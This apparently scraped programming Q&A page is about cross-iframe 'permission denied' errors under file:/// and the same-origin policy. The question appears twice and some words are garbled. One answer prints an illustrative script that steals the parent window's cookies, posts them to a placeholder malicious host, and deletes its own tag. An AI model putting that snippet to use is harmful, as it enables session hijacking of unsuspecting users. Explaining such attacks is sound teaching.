I am having an issue accessing properties from a different iframe. I keep getting this permission denied to access property error. I have seen people ask if they are using file:/// several times but no one ever is (except me) so that never gets addressed.

I am not doing this on the web. the src for all my frames are in the same file on my hard drive. I am trying to get some properties from objects I created in other frame

function fill_with_pairs()
{
    for (var x = 0 ; x < setLength ; x++)
    {
        var tempSet = sets[x];
        var tempNums = tempSet.wb_numbers;
        if (top.num_frame.active_list.active_nums[x].checked)
        {
            for (var y = 0 ; y < 4 ; y++)
            {
                var thesePairs = tempNums[y];
                var pairBase = numbersX[thesePairs];
                for (var z = y+1 ; z < 5 ; z++)
                {
                    var pairKey = tempNums[z];
                    pairBase[z]++;
                }
            }
        }
    }
}

I am having an issue accessing properties from a different iframe. I keep getting this permission denied to access property error. I have seen people ask if they are using file:/// several times but no one ever is (except me) so that never gets addressed.

I am not doing this on the web. the src for all my frames are in the same file on my hard drive. I am trying to get some properties from objects I created in other frame

function fill_with_pairs()
{
    for (var x = 0 ; x < setLength ; x++)
    {
        var tempSet = sets[x];
        var tempNums = tempSet.wb_numbers;
        if (top.num_frame.active_list.active_nums[x].checked)
        {
            for (var y = 0 ; y < 4 ; y++)
            {
                var thesePairs = tempNums[y];
                var pairBase = numbersX[thesePairs];
                for (var z = y+1 ; z < 5 ; z++)
                {
                    var pairKey = tempNums[z];
                    pairBase[z]++;
                }
            }
        }
    }
}

• javascript

• 1 it would be better showing your actual code you tried rather than making people assume what could have gone wrong..! – Sudhir Bastakoti Commented May 22, 2013 at 3:27
• 1 The iframe doesn't point to a location that has the same domain name, protocol and port as your website, so you can't interact with it. It's a browser restriction. – Blender Commented May 22, 2013 at 3:28
• I have similar issues using Chrome and accessing file:/// pages (but not iframe) The solution for me is to start Chrome with --allow-file-access-from-files. Your mileage may vary. – HBP Commented May 22, 2013 at 3:52
• @HBP forgive me for my ignorance, but where do I put --allow-file-access-from-files? do you mean above the <html> tag? – user2407689 Commented May 22, 2013 at 4:51
• No on the mand line when you start the browser. Exactly how depends on your operating system. This might help : downloadsquad.switched./2010/01/22/… – HBP Commented May 22, 2013 at 6:06

2 Answers 2

The code below

<iframe src="http://example." onload="test(this)"></iframe>
<script>
function test(frame)
{
    var cDoc = frame.contentDocument;
}
</script>

Throws

Unsafe JavaScript attempt to access frame with URL http://example.iana from frame with URL {your URL}. Domains, protocols and ports must match.

The protocols must match (eg: the main window and the iframe protocols must be either file: or http: to name a couple).

The domains must match (eg: the main window and the iframe domains must be example.)

The ports must match (eg: the main window and the iframe ports must be 80 or 8080)

This is to protect users from code being executed from malicious sites, which, had these boundaries not been put in place, could easily steal data from an unsuspecting user.

An example of malicious JavaScript code:

<script id="loadScript">
window.onload = function()
{
    //grab parent to iframe
    var parentWindow = window.parent.window;
    //grab cookies from parent window
    var cookies = parentWindow.document.cookie;
    //send cookies off to malicious site
    var form = document.createElement("form");
    var inp = document.createElement("input");
    form.action="http://malicious./maliciousAd.php";
    form.method="post";
    inp.value=cookies;
    inp.name="cookies";
    form.appendChild(inp);
    form.submit();
    //remove traces of malicious code
    document.body.removeChild(document.getElementById("loadScript"))
}
</script>

Any JavaScript that attempts to access properties of a document on a different domain (e.g. in an iframe element) is in violation of the security concept called the same origin policy.

In puting, the same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site – a bination of scheme, hostname, and port number1 – to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.